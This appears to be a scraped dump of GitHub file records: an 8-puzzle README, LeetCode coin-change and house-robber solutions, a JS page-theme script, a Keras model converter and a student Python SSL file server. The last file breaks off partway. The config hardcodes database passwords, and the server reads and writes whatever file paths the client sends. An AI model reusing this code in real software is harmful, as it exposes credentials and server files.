"Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 240, "license_type": "permissive", "max_line_length": 118, "num_lines": 4, "path": "/README.md", "repo_name": "rafael-telles/8Puzzle-Solver", "src_encoding": "UTF-8", "text": "# 8Puzzle-Solver\nSimple Python implementation of Best-first search (A*) to solve 8-Puzzle. Wrote for academic purposes.\n\nIt uses the sum of Manhattan distance of each number compared to where it should be in the puzzle as heuristic method.\n" } ]
2
domzhaomathematics/DP-1
https://github.com/domzhaomathematics/DP-1
cc85708ad1af5b42790ac96888cbeeed1fd46e6b
d5be199f89072ae367d334556ec7c2b7ce53f621
f694210a030436598bb97cceefaa379b51804f76
refs/heads/master
2022-04-27T20:01:48.864737
2020-04-29T21:53:34
2020-04-29T21:53:34
260,054,004
0
0
null
2020-04-29T21:53:07
2019-07-15T09:09:44
2020-04-29T07:14:05
null
[ { "alpha_fraction": 0.670292317867279, "alphanum_fraction": 0.683548629283905, "avg_line_length": 48.86440658569336, "blob_id": "00dea6e397d98fbfbf3884d7ac1bdbb5bf765c34", "content_id": "11e47eab18b012efb29827c53ebfba8b679193e6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2942, "license_type": "no_license", "max_line_length": 294, "num_lines": 59, "path": "/DP-1.py", "repo_name": "domzhaomathematics/DP-1", "src_encoding": "UTF-8", "text": "#Problem 1: Coin Change\n#Time Complexity O(N*A), A the amount and N length of coins\n#Space Complexity O(N)\n#Worked on leetcode? : Yes\n'''\nMain idea: We ask ourselves how can we divide the problem into subproblems such that\nthese subproblems can help us getting the next subproblem until the final answer.\nThe idea is to initiate an array of length \"amount\" we're trying to reach.\nThen, after initialising 0 with 0 coins, we start with One. We check ,for each coins\nif Best(1-coins)+1 is better than our min right now (initialise to inf). We continue\nfor each index (subproblem amount) if best(index-coins)+1 is better than our min now,\nfor each coins. We do that until we reach the amount desired.\nThis works because each increment of subproblem is 1, so there must be a way to\nreach the index from previous indices since index-coin will always be solved before.\n'''\nclass Solution:\n def coinChange(self, coins: List[int], amount: int) -> int:\n #edge case\n if not amount:\n return 0\n # 0,1,2,....,amount. the index represent what we want to reach\n subproblems=[float(\"inf\")]*(amount+1)\n subproblems[0]=0\n\n for i,sub in enumerate(subproblems):\n for coin in coins:\n #Obviously, if difference is smaller, no need to check the coin\n if i-coin>=0:\n subproblems[i]=min(subproblems[i],subproblems[i-coin]+1)\n\n if subproblems[-1]==float('inf'):\n return -1\n return subproblems[-1]\n\n#Problem 2: House Robber\n#Time Complexity O(N) ( O(2*N) but we ignore the constant)\n#Space Complexity O(N)\n#Worked on leetcode? : Yes\n\n'''\nidea: divide into subproblems, how much can I rob until house 0, house 1, house 2. at each index, I can check, is it better to not rob this house, and take\nkeep the same amount max amount at the index before? or rob this house and take the max amount as the one before the one before? Since when traversing the previous\nsubproblems will already be solved, so no need to worry what is the best combination before we get to this house and no need to worry that we took a adjacent house in the subproblems. We only can't take both the previous one and the one right now. we initialise 0 at 0 and house one at value 1,\nsince obviously if there's only one house we rob it.\n'''\nclass Solution:\n def rob(self, nums: List[int]) -> int:\n #edge case\n if not nums:\n return 0\n subproblems=[0]*(len(nums)+1)\n subproblems[1]=nums[0]\n #careful, the index of the subproblem represents the number of house, not the house index\n #for the house index we do subproblems_index-1\n for i in range(2,len(subproblems)):\n #i-2 is the one before the one before subproblem (or house)\n #or is better to just ignore this house?\n subproblems[i]=max(nums[i-1]+subproblems[i-2],subproblems[i-1])\n return subproblems[-1]\n" } ]
1
1flurry/Xiaoyu.github.io
https://github.com/1flurry/Xiaoyu.github.io
4657c8671644322638600d52ba7ae24ec8f89fc2
4f106b5c9370f0fb098b90263bf3f46db1e8bd51
7643b627c2f7675411c7a062aaf1c36b66c2d52b
refs/heads/master
2020-03-25T20:16:09.826626
2018-09-29T09:30:46
2018-09-29T09:30:46
144,123,663
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.54347825050354, "alphanum_fraction": 0.614130437374115, "avg_line_length": 45, "blob_id": "6d4edf8d56389c7d8052b3e7929b513af3aed356", "content_id": "9755dc3975f28ba5092f0f0c1e20e3b880f2ad54", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 560, "license_type": "permissive", "max_line_length": 109, "num_lines": 12, "path": "/search/service/configs.py", "repo_name": "1flurry/Xiaoyu.github.io", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# 数据存储\n# DATA_REDIS = {'host': '10.250.179.150', 'port': 6379, 'password': 'redis#dev'}\n# DATA_REDIS = {'host': 'localhost', 'port': 6379, 'password': None}\nDATA_MYSQL = {'host': \"localhost\", 'user': \"root\", 'password': \"123456\", 'database': \"AIE_Detect_Result\"}\n# CFG_REDIS = {'host': '10.250.179.150', 'port': 6379, 'password': 'redis#dev'}\nCFG_REDIS = {'host': 'localhost', 'port': 6380, 'password': None}\n\nALGORITHM_CFG_TABLE = '__algorithm_cfg_table__'\nALGORITHM_RST_TABLE = '__algorithm_rst_'\n" }, { "alpha_fraction": 0.49035876989364624, "alphanum_fraction": 0.5616454482078552, "avg_line_length": 27.52666664123535, "blob_id": "d4a4ba83c47ae382b20acabcf4925593c1962621", "content_id": "a2166c7aa9b07274b1e1bde7dd545cd5b034472b", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 8585, "license_type": "permissive", "max_line_length": 62, "num_lines": 300, "path": "/个人主页2_files/hf.js", "repo_name": "1flurry/Xiaoyu.github.io", "src_encoding": "GB18030", "text": "var listactive = \"listactive01\";\n\n//个性化选择预览\nfunction work_ys(obj)\n{\n var_ys = obj;\n var which = obj;\n var bodybg,\n topbg,\n btncolor,\n bgimg,\n bannerimg,\n lxfsbtncolor;\n\n\tswitch (Number(which)) {\n\t\tcase 1:\n\t\t\tbodybg = \"#ECECEC\";\n\t\t\ttopbg = \"#798399\";\n\t\t\tbtncolor = \"#939fb8\";\n\t\t\tbgimg = \"url(\" + var_path + \"web/hf/img0_02.jpg)\";\n\t\t\tbannerimg = \"url(\" + var_path + \"web/hf/img0_03.jpg)\";\n\t\t\tlxfsbtncolor = \"#939fb8\";\n\t\t\tlistactive = \"listactive20\";\n\t\t\tbreak;\n\t\tcase 2:\n\t\t\tbodybg = \"#fffdca\";\n\t\t\ttopbg = \"#716f24\";\n\t\t\tbtncolor = \"#b5b136\";\n\t\t\tbgimg = \"url(\" + var_path + \"web/hf/bgimg-02.jpg)\";\n\t\t\tbannerimg = \"url(\" + var_path + \"web/hf/banner-02.jpg)\";\n\t\t\tlxfsbtncolor = \"#858228\";\n\t\t\tlistactive = \"listactive02\";\n\t\t\tbreak;\n\t\tcase 3:\n\t\t\tbodybg = \"#d6c5a7\";\n\t\t\ttopbg = \"#665f4f\";\n\t\t\tbtncolor = \"#9b8353\";\n\t\t\tbgimg = \"url(\" + var_path + \"web/hf/bgimg-03.jpg)\";\n\t\t\tbannerimg = \"url(\" + var_path + \"web/hf/banner-03.jpg)\";\n\t\t\tlxfsbtncolor = \"#826e46\";\n\t\t\tlistactive = \"listactive03\";\n\t\t\tbreak;\n case 4:\n bodybg = \"#ebeceb\";\n topbg = \"#1d324e\";\n btncolor = \"#204473\";\n bgimg = \"url(\" + var_path + \"web/hf/bgimg-04.jpg)\";\n bannerimg = \"url(\" + var_path + \"web/hf/banner-04.jpg)\";\n lxfsbtncolor = \"#204473\";\n\t\t\tlistactive = \"listactive04\";\n\t\t\tbreak;\n case 5:\n bodybg = \"#edfdfb\";\n topbg = \"#46886e\";\n btncolor = \"#78b19b\";\n bgimg = \"url(\" + var_path + \"web/hf/bgimg-05.jpg)\";\n bannerimg = \"url(\" + var_path + \"web/hf/banner-05.jpg)\";\n lxfsbtncolor = \"#78b19b\";\n\t\t\tlistactive = \"listactive05\";\n\t\t\tbreak;\n case 6:\n bodybg = \"#eaeef6\";\n topbg = \"#2462ae\";\n btncolor = \"#3075c9\";\n bgimg = \"url(\" + var_path + \"web/hf/bgimg-06.jpg)\";\n bannerimg = \"url(\" + var_path + \"web/hf/banner-06.jpg)\";\n lxfsbtncolor = \"#3075c9\";\n\t\t\tlistactive = \"listactive06\";\n\t\t\tbreak;\n case 7:\n bodybg = \"#f6f6e4\";\n topbg = \"#b0ac90\";\n btncolor = \"#cdc8a9\";\n bgimg = \"url(\" + var_path + \"web/hf/bgimg-07.jpg)\";\n bannerimg = \"url(\" + var_path + \"web/hf/banner-07.jpg)\";\n lxfsbtncolor = \"#cdc8a9\";\n\t\t\tlistactive = \"listactive07\";\n\t\t\tbreak;\n case 8:\n bodybg = \"#e9f0f5\";\n topbg = \"#4d697a\";\n btncolor = \"#628ca4\";\n bgimg = \"url(\" + var_path + \"web/hf/bgimg-08.jpg)\";\n bannerimg = \"url(\" + var_path + \"web/hf/banner-08.jpg)\";\n lxfsbtncolor = \"#628ca4\";\n\t\t\tlistactive = \"listactive08\";\n\t\t\tbreak;\n case 9:\n bodybg = \"#ffffff\";\n topbg = \"#e04421\";\n btncolor = \"#f25e3d\";\n bgimg = \"url(\" + var_path + \"web/hf/bgimg-09.jpg)\";\n bannerimg = \"url(\" + var_path + \"web/hf/banner-09.jpg)\";\n lxfsbtncolor = \"#f25e3d\";\n\t\t\tlistactive = \"listactive09\";\n\t\t\tbreak;\n\t\tcase 11:\n\t\t\tbodybg = \"#ffddc7\";\n\t\t\ttopbg = \"#d97058\";\n\t\t\tbtncolor = \"#ffc156\";\n\t\t\tbgimg = \"url(\" + var_path + \"web/hf/bgimg-01.jpg)\";\n\t\t\tbannerimg = \"url(\" + var_path + \"web/hf/banner-01.jpg)\";\n\t\t\tlxfsbtncolor = \"#bd8e3e\";\n\t\t\tlistactive = \"listactive01\";\n\t\t\tbreak;\n\t\tcase 13:\n\t\t\tbodybg = \"#fff\";\n\t\t\ttopbg = \"#1f5992\";\n\t\t\tbtncolor = \"#276fb5\";\n\t\t\tbgimg = \"url(\" + var_path + \"web/hf/1-1.jpg)\";\n\t\t\tbannerimg = \"url(\" + var_path + \"web/hf/1-11.jpg)\";\n\t\t\tlxfsbtncolor = \"#276fb5\";\n\t\t\tlistactive = \"listactive11\";\n\t\t\tbreak;\n\t\tcase 14:\n\t\t\tbodybg = \"#fff\";\n\t\t\ttopbg = \"#1d61ec\";\n\t\t\tbtncolor = \"#296fff\";\n\t\t\tbgimg = \"url(\" + var_path + \"web/hf/4-4.jpg)\";\n\t\t\tbannerimg = \"url(\" + var_path + \"web/hf/4-44.jpg)\";\n\t\t\tlxfsbtncolor = \"#296fff\";\n\t\t\tlistactive = \"listactive14\";\n\t\t\tbreak;\n\t\tcase 21:\n\t\t\tbodybg = \"#ECECEC\";\n\t\t\ttopbg = \"#89551d\";\n\t\t\tbtncolor = \"#a9671f\";\n\t\t\tbgimg = \"url(\" + var_path + \"web/hf/img1_02.jpg)\";\n\t\t\tbannerimg = \"url(\" + var_path + \"web/hf/img1_03.jpg)\";\n\t\t\tlxfsbtncolor = \"#a9671f\";\n\t\t\tlistactive = \"listactive21\";\n\t\t\tbreak;\n\t\tcase 22:\n\t\t\tbodybg = \"#ECECEC\";\n\t\t\ttopbg = \"#d18524\";\n\t\t\tbtncolor = \"#e3932d\";\n\t\t\tbgimg = \"url(\" + var_path + \"web/hf/img2_02.jpg)\";\n\t\t\tbannerimg = \"url(\" + var_path + \"web/hf/img2_03.jpg)\";\n\t\t\tlxfsbtncolor = \"#e3932d\";\n\t\t\tlistactive = \"listactive22\";\n\t\t\tbreak;\n\t\tcase 23:\n\t\t\tbodybg = \"#fff\";\n\t\t\ttopbg = \"#84828d\";\n\t\t\tbtncolor = \"#8c8b92\";\n\t\t\tbgimg = \"url(\" + var_path + \"web/hf/img3_02.jpg)\";\n\t\t\tbannerimg = \"url(\" + var_path + \"web/hf/img3_03.jpg)\";\n\t\t\tlxfsbtncolor = \"#8c8b92\";\n\t\t\tlistactive = \"listactive23\";\n\t\t\tbreak;\n\t\tcase 24:\n\t\t\tbodybg = \"#ECECEC\";\n\t\t\ttopbg = \"#a3408f\";\n\t\t\tbtncolor = \"#d254b9\";\n\t\t\tbgimg = \"url(\" + var_path + \"web/hf/img4_02.jpg)\";\n\t\t\tbannerimg = \"url(\" + var_path + \"web/hf/img4_03.jpg)\";\n\t\t\tlxfsbtncolor = \"#d254b9\";\n\t\t\tlistactive = \"listactive24\";\n\t\t\tbreak;\n\t\tcase 25:\n\t\t\tbodybg = \"#ECECEC\";\n\t\t\ttopbg = \"#0c1036\";\n\t\t\tbtncolor = \"#29317f\";\n\t\t\tbgimg = \"url(\" + var_path + \"web/hf/img5_02.jpg)\";\n\t\t\tbannerimg = \"url(\" + var_path + \"web/hf/img5_03.jpg)\";\n\t\t\tlxfsbtncolor = \"#29317f\";\n\t\t\tlistactive = \"listactive25\";\n\t\t\tbreak;\n\t\tcase 26:\n\t\t\tbodybg = \"#ECECEC\";\n\t\t\ttopbg = \"#565b45\";\n\t\t\tbtncolor = \"#7c855e\";\n\t\t\tbgimg = \"url(\" + var_path + \"web/hf/img6_02.jpg)\";\n\t\t\tbannerimg = \"url(\" + var_path + \"web/hf/img6_03.jpg)\";\n\t\t\tlxfsbtncolor = \"#7c855e\";\n\t\t\tlistactive = \"listactive26\";\n\t\t\tbreak;\n\t\tcase 27:\n\t\t\tbodybg = \"#ECECEC\";\n\t\t\ttopbg = \"#494546\";\n\t\t\tbtncolor = \"#746e6f\";\n\t\t\tbgimg = \"url(\" + var_path + \"web/hf/img7_02.jpg)\";\n\t\t\tbannerimg = \"url(\" + var_path + \"web/hf/img7_03.jpg)\";\n\t\t\tlxfsbtncolor = \"#746e6f\";\n\t\t\tlistactive = \"listactive27\";\n\t\t\tbreak;\n\t\tcase 31:\n\t\t\tbodybg = \"#ECECEC\";\n\t\t\ttopbg = \"#f69c5c\";\n\t\t\tbtncolor = \"#f8ae7a\";\n\t\t\tbgimg = \"url(\" + var_path + \"web/hf/img31_02.jpg)\";\n\t\t\tbannerimg = \"url(\" + var_path + \"web/hf/img31_03.jpg)\";\n\t\t\tlxfsbtncolor = \"#f8ae7a\";\n\t\t\tlistactive = \"listactive31\";\n\t\t\tbreak;\n\t\tcase 32:\n\t\t\tbodybg = \"#ECECEC\";\n\t\t\ttopbg = \"#6d6e25\";\n\t\t\tbtncolor = \"#8d8e25\";\n\t\t\tbgimg = \"url(\" + var_path + \"web/hf/img32_02.jpg)\";\n\t\t\tbannerimg = \"url(\" + var_path + \"web/hf/img32_03.jpg)\";\n\t\t\tlxfsbtncolor = \"#8d8e25\";\n\t\t\tlistactive = \"listactive32\";\n\t\t\tbreak;\n\t\tcase 33:\n\t\t\tbodybg = \"#ECECEC\";\n\t\t\ttopbg = \"#313c47\";\n\t\t\tbtncolor = \"#475562\";\n\t\t\tbgimg = \"url(\" + var_path + \"web/hf/img33_02.jpg)\";\n\t\t\tbannerimg = \"url(\" + var_path + \"web/hf/img33_03.jpg)\";\n\t\t\tlxfsbtncolor = \"#475562\";\n\t\t\tlistactive = \"listactive33\";\n\t\t\tbreak;\n\t\tcase 34:\n\t\t\tbodybg = \"#ECECEC\";\n\t\t\ttopbg = \"#494546\";\n\t\t\tbtncolor = \"#746e6f\";\n\t\t\tbgimg = \"url(\" + var_path + \"web/hf/img34_02.jpg)\";\n\t\t\tbannerimg = \"url(\" + var_path + \"web/hf/img34_03.jpg)\";\n\t\t\tlxfsbtncolor = \"#746e6f\";\n\t\t\tlistactive = \"listactive34\";\n\t\t\tbreak;\n\t\tcase 35:\n\t\t\tbodybg = \"#ECECEC\";\n\t\t\ttopbg = \"#102633\";\n\t\t\tbtncolor = \"#1d4a65\";\n\t\t\tbgimg = \"url(\" + var_path + \"web/hf/img35_02.jpg)\";\n\t\t\tbannerimg = \"url(\" + var_path + \"web/hf/img35_03.jpg)\";\n\t\t\tlxfsbtncolor = \"#1d4a65\";\n\t\t\tlistactive = \"listactive35\";\n\t\t\tbreak;\n\t\tcase 36:\n\t\t\tbodybg = \"#ECECEC\";\n\t\t\ttopbg = \"#fea701\";\n\t\t\tbtncolor = \"#feba39\";\n\t\t\tbgimg = \"url(\" + var_path + \"web/hf/img36_02.jpg)\";\n\t\t\tbannerimg = \"url(\" + var_path + \"web/hf/img36_03.jpg)\";\n\t\t\tlxfsbtncolor = \"#feba39\";\n\t\t\tlistactive = \"listactive36\";\n\t\t\tbreak;\n\t\tcase 37:\n\t\t\tbodybg = \"#ECECEC\";\n\t\t\ttopbg = \"#1f5992\";\n\t\t\tbtncolor = \"#276fb5\";\n\t\t\tbgimg = \"url(\" + var_path + \"web/hf/img37_02.jpg)\";\n\t\t\tbannerimg = \"url(\" + var_path + \"web/hf/img37_03.jpg)\";\n\t\t\tlxfsbtncolor = \"#276fb5\";\n\t\t\tlistactive = \"listactive37\";\n\t\t\tbreak;\n\t\tcase 38:\n\t\t\tbodybg = \"#ECECEC\";\n\t\t\ttopbg = \"#a82b3a\";\n\t\t\tbtncolor = \"#c73244\";\n\t\t\tbgimg = \"url(\" + var_path + \"web/hf/img38_02.jpg)\";\n\t\t\tbannerimg = \"url(\" + var_path + \"web/hf/img38_03.jpg)\";\n\t\t\tlxfsbtncolor = \"#c73244\";\n\t\t\tlistactive = \"listactive38\";\n\t\t\tbreak;\n\t}\n\t$(\".hf-bodybg\").css(\"background-color\", bodybg);\n\t$(\".hf-topbg,.bqxz\").css(\"background-color\", topbg);\n\t//$(\".hf-bordor\").css(\"border-color\", topbg);\n\t$(\".hf-btncolor\").css(\"background-color\", btncolor);\n\t$(\".hf-bgimg\").css(\"background-image\", bgimg);\n\t$(\".hf-bannerimg\").css(\"background-image\", bannerimg);\n\t$(\".hf-lxfsbtn\").css(\"background-color\", lxfsbtncolor);\n\t$(\".hf-color\").css(\"color\", topbg);\n\t$(\".biaoqianline a\").removeClass();\n\t$(\".biaoqianline a\").eq(0).addClass(listactive);\n\t$(\".biaoqianline a\").click(function(){\n $(\".biaoqianline a\").removeClass();\n $(this).addClass(listactive);\n });\n \n try {\n if (typeof(var_yqid) != \"undefined\"){ \n work_dh(var_yqid);\n }\n }catch(e){}\n}\n//个性化选择保存\nfunction work_submit(yhid) {\n which = var_ys;\n \n $.ajax({\n type: \"post\",\n url: var_path + \"web/stage2/grxx_do.jsp\",\n data: {\n operate: \"ys\",\n ys: which,\n yhid: yhid\n },\n success: function(data) {\n $('#myModal').modal('hide');\n var_java_ys = which;\n work_ys(which);\n work_dh(var_yqid);\n }\n });\n}" }, { "alpha_fraction": 0.7021276354789734, "alphanum_fraction": 0.7065081596374512, "avg_line_length": 43.38888931274414, "blob_id": "8528181e94dad0d20790a17bf707ac57ad3d07b5", "content_id": "6dd7df87648cc884952f43399dc441c3841b2d25", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1598, "license_type": "permissive", "max_line_length": 111, "num_lines": 36, "path": "/AIE/change/keras_to_tensorflow.py", "repo_name": "1flurry/Xiaoyu.github.io", "src_encoding": "UTF-8", "text": "import sys\nfrom keras.models import load_model\nimport tensorflow as tf\nimport os\nimport os.path as osp\nfrom keras import backend as K\nfrom tensorflow.python.framework import graph_io\ndef freeze_session(session, keep_var_names=None, output_names=None, clear_devices=True):\n from tensorflow.python.framework.graph_util import convert_variables_to_constants\n graph = session.graph\n with graph.as_default():\n freeze_var_names = list(set(v.op.name for v in tf.global_variables()).difference(keep_var_names or []))\n output_names = output_names or []\n output_names += [v.op.name for v in tf.global_variables()]\n input_graph_def = graph.as_graph_def()\n if clear_devices:\n for node in input_graph_def.node:\n node.device = \"\"\n frozen_graph = convert_variables_to_constants(session, input_graph_def,output_names, freeze_var_names)\n return frozen_graph\n\n#input_fld = sys.path[0]\nweight_file = 'cnn-2121.h5'\noutput_graph_name = 'model.pb'\noutput_fld = 'D:/tensorflow_model/'\nif not os.path.isdir(output_fld):\n os.mkdir(output_fld)\nweight_file_path = osp.join('D:/', weight_file)\nK.set_learning_phase(0)\nnet_model = load_model(weight_file_path)\nprint('input is :', net_model.input.name)\nprint ('output is:', net_model.output.name)\nsess = K.get_session()\nfrozen_graph = freeze_session(K.get_session(), output_names=[net_model.output.op.name])\ngraph_io.write_graph(frozen_graph, output_fld, output_graph_name, as_text=False)\nprint('saved the constant graph (ready for inference) at: ', osp.join(output_fld, output_graph_name))\n" }, { "alpha_fraction": 0.49390003085136414, "alphanum_fraction": 0.5064935088157654, "avg_line_length": 23.190475463867188, "blob_id": "d27897fb7eb1f6c90d7b62bfe223b739b497bbe7", "content_id": "0aaf9c6e9ad18f6235157626c76eb58eb3ba3611", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2625, "license_type": "permissive", "max_line_length": 78, "num_lines": 105, "path": "/security/server_main.py", "repo_name": "1flurry/Xiaoyu.github.io", "src_encoding": "UTF-8", "text": "import _thread\nimport time\nimport sys\nimport os\n#import log\n#import db_update\nimport sqlite3\nimport socket\nimport thread\nMAX_THR_NUM = 100\n\nclass FilePackage:\n def __init__(self):\n self.cmd = ''\n self.filesize = 0\n self.ack = 0\n self.username = ''\n self.filename = ''\n #mode_t mode; // 文件的权限\n self.buf = ''\n\nclass server:\n def __init__(self):\n self.cmd = ''\n self.filesize = 0\n self.ack = 0\n self.username = ''\n self.filename = ''\n #mode_t mode; // 文件的权限\n self.buf = ''\n\n def InitMaxClientNum():\n buf = \"\"\n with open(\"./maxclientnum.txt\",\"r\") as fd:\n nBytes=fd.readlines()\n for n in nBytes:\n if int(n) < 0:\n print(\"Data Error!(need > 0)\")\n return -1\n return int(n)\n\n #管理员身份认证模块\n def CheckAdmin(id,pwd):\n conn = sqlite3.connect('admin_db.db')\n cursor = conn.execute(\"SELECT PASSWORD from admin where ID = ?\",[id])\n for row in cursor:\n if pwd == row[0]:\n conn.close()\n return 1\n else:\n conn.close()\n return 0\n\n #管理员登录模块\n def login():\n flag = 0\n while flag != 1:\n print(\"Admin Id:\")\n Adminid = input()\n print(\"Admin Password\")\n Adminpwd = input()\n res = server.CheckAdmin(int(Adminid),Adminpwd)\n if res == 1:\n flag = 1\n print('login sucess!')\n else:\n print('login faile!')\n\ndef Process(CurrentClientNum):\n sendPackage = FilePackage()\n CurrentClientNum = CurrentClientNum + 1\n if CurrentClientNum > maxClientNum:\n sendPackage = pack('L',\" \",\" \",0,2,1,\"\")\n CurrentClientNum = CurrentClientNum - 1\n return 0\n buff = FilePackage()\n \n\n \n\nif __name__ == '__main__':\n maxClientNum = server.InitMaxClientNum()\n CurrentClientNum = 0\n print('Max Client Number is',maxClientNum)\n server.login()\n test = thread.MainThread()\n test.server()\n\n \n'''\ndef print_time( threadName, delay):\n count = 0\n while count < 5:\n time.sleep(delay)\n count += 1\n print (\"%s: %s\" % ( threadName, time.ctime(time.time()) ))\n\ntry:\n\t#界面线程\n _thread.start_new_thread( print_time, (\"ControId\", 2, ) )\n #处理数据线程\n _thread.start_new_thread( print_time, (\"Thread-2\", 4, ) )\nexcept:\n print (\"Error: 无法启动线程\")\n'''\n\n" }, { "alpha_fraction": 0.47889038920402527, "alphanum_fraction": 0.48998647928237915, "avg_line_length": 35.04878234863281, "blob_id": "3cfd45bb521aaf83beb5aae93b70944b0ac901e6", "content_id": "04ff4bdba9439764452f7e0e8116295847d5dd95", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7404, "license_type": "permissive", "max_line_length": 159, "num_lines": 205, "path": "/security/server.py", "repo_name": "1flurry/Xiaoyu.github.io", "src_encoding": "UTF-8", "text": "import os\nimport socket\nimport hashlib\nimport threading\nimport time\nimport struct\nimport ssl\nimport sqlite3\n\ndef InitMaxClientNum():\n buf = \"\"\n with open(\"./maxclientnum.txt\",\"r\") as fd:\n nBytes=fd.readlines()\n for n in nBytes:\n if int(n) < 0:\n print(\"Data Error!(need > 0)\")\n return -1\n return int(n)\n \ndef InitHost():\n host = \"\"\n with open(\"./host.txt\",\"r\") as fd:\n n2 = fd.readlines()\n for n in n2:\n return n\n\ndef tcplink(sock, addr):\n print('Accept new connection from ' ,addr)\n sock.send(b'Welcome!')\n while True:\n data = sock.recv(1024)\n time.sleep(1)\n if not data or data.decode('utf-8') == 'exit':\n break\n sock.send(('Hello, %s!' % data.decode('utf-8')).encode('utf-8'))\n sock.close()\n print('Connection from '+str(addr)+' closed')\n\n\n \n\nclass FileServer:\n def __init__(self):\n self.dataFormat = '20s20s8s32s100s100sl'\n self.cafile = \"./cert/ca.crt\"\n self.certfile = \"./cert/server.pem\"\n #soketlen_t clie_len\n\n def struct_pack(self):\n ret = struct.pack(self.dataFormat, self.username.encode(), self.pwd.encode(), self.action.encode(), self.md5sum.encode(), self.clientfilePath.encode(),\n self.serverfilePath.encode(), self.size)\n return ret\n \n def struct_unpack(self, package):\n self.username, self.pwd, self.action, self.md5sum, self.clientfilePath, self.serverfilePath, self.size = struct.unpack(self.dataFormat, package)\n self.username = self.username.decode().strip('\\x00')\n self.pwd = self.pwd.decode().strip('\\x00')\n self.action = self.action.decode().strip('\\x00')\n self.md5sum = self.md5sum.decode().strip('\\x00')\n self.clientfilePath = self.clientfilePath.decode().strip('\\x00')\n self.serverfilePath = self.serverfilePath.decode().strip('\\x00')\n\n def CheckUsers(self,sock,addr):\n fileinfo_size = struct.calcsize(self.dataFormat)\n self.buf = sock.recv(fileinfo_size)\n if self.buf:\n self.struct_unpack(self.buf)\n name = self.username\n pwd = self.pwd\n print(name,pwd)\n\n conn = sqlite3.connect('admin_db.db')\n print (\"Opened database successfully\")\n cursor = conn.execute(\"SELECT PASSWORD from admin where ID = ?\",list(name))\n for row in cursor:\n if pwd == row[0]:\n sock.send(b'1')\n filelist = self.GetFileList()\n sock.send(filelist.encode())\n self.FileSave(sock, addr)\n\n else:\n sock.send(b'0')\n print(\"error\")\n '''\n sock.close()\n print('Connection from {0} closed.'.format(addr))\n conn.close()\n '''\n return 0\n\n def GetFileList(self):\n files= os.listdir(\"./server_data\")\n return \",\".join(files)\n\n def GetMD5(self,filepath):\n fd = open(filepath,\"r\")\n fcont = fd.readlines()\n fd.close()\n fmd5 = hashlib.md5(str(fcont).encode(\"utf-8\"))\n return fmd5.hexdigest() \n\n def FileSave(self,sock,addr):\n print ('Accept new connection from {0}'.format(addr))\n while True:\n fileinfo_size = struct.calcsize(self.dataFormat)\n self.buf = sock.recv(fileinfo_size)\n if self.buf:\n self.struct_unpack(self.buf)\n print(self.action)\n\n if self.action.startswith(\"upload\"):\n if os.path.isdir(self.serverfilePath):\n fileName = (os.path.split(self.clientfilePath))[1]\n self.serverfilePath = os.path.join(self.serverfilePath, fileName)\n filePath,fileName = os.path.split(self.serverfilePath)\n if not os.path.exists(filePath):\n sock.send(str.encode('dirNotExist'))\n else:\n sock.send(str.encode('ok'))\n recvd_size = 0\n file = open(self.serverfilePath, 'wb')\n while not recvd_size == self.size:\n if self.size - recvd_size > 1024:\n rdata = sock.recv(1024)\n recvd_size += len(rdata)\n else:\n rdata = sock.recv(self.size - recvd_size)\n recvd_size = self.size\n file.write(rdata)\n file.close()\n output = self.GetMD5(self.serverfilePath)\n if output == self.md5sum:\n sock.send(str.encode('ok'))\n else:\n sock.send(str.encode('md5sum error'))\n\n elif self.action.startswith(\"download\"):\n filePath,fileName = os.path.split(self.serverfilePath)\n print(self.serverfilePath)\n if os.path.exists(filePath):\n self.md5sum = self.GetMD5(self.serverfilePath)\n self.action = 'ok'\n self.size = os.stat(self.serverfilePath).st_size\n ret = self.struct_pack()\n sock.send(ret)\n fo = open(self.serverfilePath, 'rb')\n while True:\n filedata = fo.read(1024)\n if not filedata:\n break\n sock.send(filedata)\n fo.close()\n else:\n self.action = 'nofile'\n ret = self.struct_pack()\n sock.send(ret)\n \n sock.close()\n print('Connection from {0} closed.'.format(addr))\n break\n\n\n def server(self):\n maxclientnum = InitMaxClientNum()\n server_port = 9999\n host = InitHost()\n\n purpose = ssl.Purpose.CLIENT_AUTH\n context = ssl.create_default_context(purpose, cafile=self.cafile)\n context.load_cert_chain(self.certfile)\n\n try:\n socketfd = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n print(socketfd)\n except:\n print(\"Socket Build Error!\")\n else:\n socketfd.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n try:\n socketfd.bind((host,server_port))\n except:\n print(\"Sokcet Bind Error!\")\n else:\n try:\n socketfd.listen(maxclientnum)\n except:\n print(\"Socket Listen Error!\")\n else:\n print('Waiting for connection...')\n while True:\n # 接受一个新连接:\n sock, addr = socketfd.accept()\n\n ssl_sock = context.wrap_socket(sock, server_side=True)\n t1 = threading.Thread(target=self.CheckUsers, args=(ssl_sock, addr))\n t1.start()\n \n\n\n\nif __name__ == '__main__':\n test = FileServer()\n test.server()\n #test.server()\n" }, { "alpha_fraction": 0.551189124584198, "alphanum_fraction": 0.5778964757919312, "avg_line_length": 39.271793365478516, "blob_id": "7696448af9e1b693893c94ef3fb385345fbb76dd", "content_id": "94a97ed1c7f936d63d3458e835d732ae43a37e50", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8425, "license_type": "permissive", "max_line_length": 265, "num_lines": 195, "path": "/AIE/tensorflow/cnn.py", "repo_name": "1flurry/Xiaoyu.github.io", "src_encoding": "UTF-8", "text": "import os\nimport sys\nimport time\nfrom datetime import timedelta\nimport numpy as np\nimport tensorflow as tf\nimport sklearn\nfrom sklearn.cross_validation import train_test_split\nfrom sklearn import metrics\nimport tldextract\nfrom tensorflow.python.framework import graph_io\nfrom tensorflow.python.framework import 